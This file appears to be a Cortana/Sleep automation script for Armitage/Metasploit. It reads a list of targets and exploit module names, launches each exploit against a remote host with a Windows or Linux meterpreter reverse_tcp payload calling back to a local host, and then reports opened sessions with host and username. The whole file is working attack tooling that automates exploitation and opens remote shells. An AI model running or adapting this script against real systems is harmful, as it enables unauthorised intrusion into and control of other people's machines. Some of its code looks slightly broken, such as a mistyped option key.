debug (7 | 24)

on ready {

}

command arguments {
   local('$counter @attacks $payload');

   $counter = $1;
   @attacks = split(';', "$2");
   $payload = determinePayload($3);
   
   fire_event_local("launch_attacks", $counter, @attacks, $payload);
}

on launch_attacks {
   local('$attack $exploit $rhost $lhost $os $console $name');
   $console = console();
   
   foreach $attack ($2) {
      ($name, $rhost, $lhost, $os) = split(',', $attack);
      $exploit = "exploit/" . $name;
      
      cmd($console, "use $exploit");
      cmd_set($console, %(rhost => "$rhost", $lhost => "$lhost", payload => "$3",
         target => "0"));
      cmd($console, "exploit -j");
      
      println("loop");
      spawn({
         sub timer {
            local('$console');
            $console = console();
            cmd($console, "jobs -K");
            cmd_stop($console);
            
            sleep(10000);
            quit();
         }
      });
      quit();
   }
    
   quit();
}

sub determinePayload {
   if ($1 == "windows") {
	   return "windows/meterpreter/reverse_tcp";
   }
   return "linux/x86/meterpreter/reverse_tcp";
}

on session_open {
   local('$flag $host $user $sessionNum %r');
   %r = $2;
   $flag = "success";
   #println("Session open: $1 => $2");
   $sessionNum = $1;
   $host = %r["host"];
   $user = %r["username"];
   println("$flag" . "," . "$sessionNum" . "," . "$host" . "," . "$user");
   quit();
}
